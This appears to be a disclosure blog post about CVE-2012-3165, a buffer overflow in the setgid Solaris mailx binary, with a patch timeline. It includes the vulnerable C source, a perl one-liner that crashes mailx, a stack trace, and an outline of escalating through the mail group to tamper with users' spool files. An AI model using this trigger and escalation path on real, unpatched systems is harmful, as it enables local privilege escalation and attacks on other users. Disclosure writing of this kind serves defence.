contents
2022/01/31solaris mailx(1) buffer overflow vulnerability
2012/10/18
tags: solaris mailx vulnerability CVE-2012-3165
summary
mailx(1) on Solaris 10 and 11 is world-executable, setgid and
vulnerable to a buffer overflow bug. Via the mail group a local
attacker potentially wins access to the local mail spool (/var/mail)
and sendmail(8) configuration. They may then repeat the attack on any
user susceptible to using mailx to read from the spool.
details
The problem occurs in the copyin() function of head.c (cribbed from
an old copy of OpenSolaris source):
/*
* Copy the string on the left into the string on the right
* and bump the right (reference) string pointer by the length.
* Thus, dynamically allocate space in the right string, copying
* the left string into it.
*/
static char *
copyin(char src[], char **space)
{
register char *cp, *top;
register int s;
s = strlen(src);
cp = *space;
top = cp;
strcpy(cp, src);
cp += s + 1;
*space = cp;
return(top);
}
The phrase "dynamically allocate" in the comment is incorrect. No new memory is allocated and therefore the target can be overrun. We can hit this by providing a very long "From" line in a message:
From AAAAAAAAAAAAA...
like this:
mallory@sunos:~$ perl -e 'print "From ".("a"x2048)."\n";' > /tmp/mbox
mallory@sunos:~$ mailx -f /tmp/mbox
Bus Error (core dumped)
mallory@sunos:~$
On SPARC this generates SIGBUS with stack:
ffbfcee8 setptr+0x49c(41414141, 43530, 0, 1, 0, 1)
ffbff778 setfile+0x510(40c00, 1, 1, 436e8, 44f8c, 43400)
ffbff8e0 main+0xa04(44800, 6d, 46910, 46910, 3f400, 1)
ffbff9c0 _start+0x108(0, 0, 0, 0, 0, 0)
here:
setptr+0x498: f0 03 a0 64 ld [%sp + 0x64], %i0
setptr+0x49c: ec 06 20 00 ld [%i0], %l6
At this point (setptr+0x49c), register %i0 contains:
%i0 = 0x41414141
whereas it should contain the progname string variable's address
("mailx"). That is, the stack has been clobbered by "AAA...".
spool
The local mail spool typically looks like this:
drwxrwxrwt 3 root mail 512 Oct 17 02:03 /var/mail
-rw-rw---- 1 root mail 709 Sep 26 05:54 /var/mail/root
If the mail file does not already exist then the attacker can immediately
create a malicious file (since the spool is world-writable). Otherwise
they can first attack the mail group and then use those privileges
to obliterate and replace any existing mail file in order to target
individual users or roles, including root.
historical footnote
I checked back through the UNIX archives via Unix Tree to see just how old this bug was. I can trace it right back to BSD 2.79 (and it may be even older). 2.79 was released for the PDP-11 in 1979 making this the oldest bug I've ever found by quite a way.
timeline
- 2012/03/30 reported to Oracle security
- 2012/04/03 Oracle assign tracking number S0171446
- 2012/05/23 test case requested and provided
- 2012/05/25 Oracle assigned bug tracking number 7158514
- 2012/06/05 CVE-2012-3165
- 2012/10/16 Oracle Critical Patch Update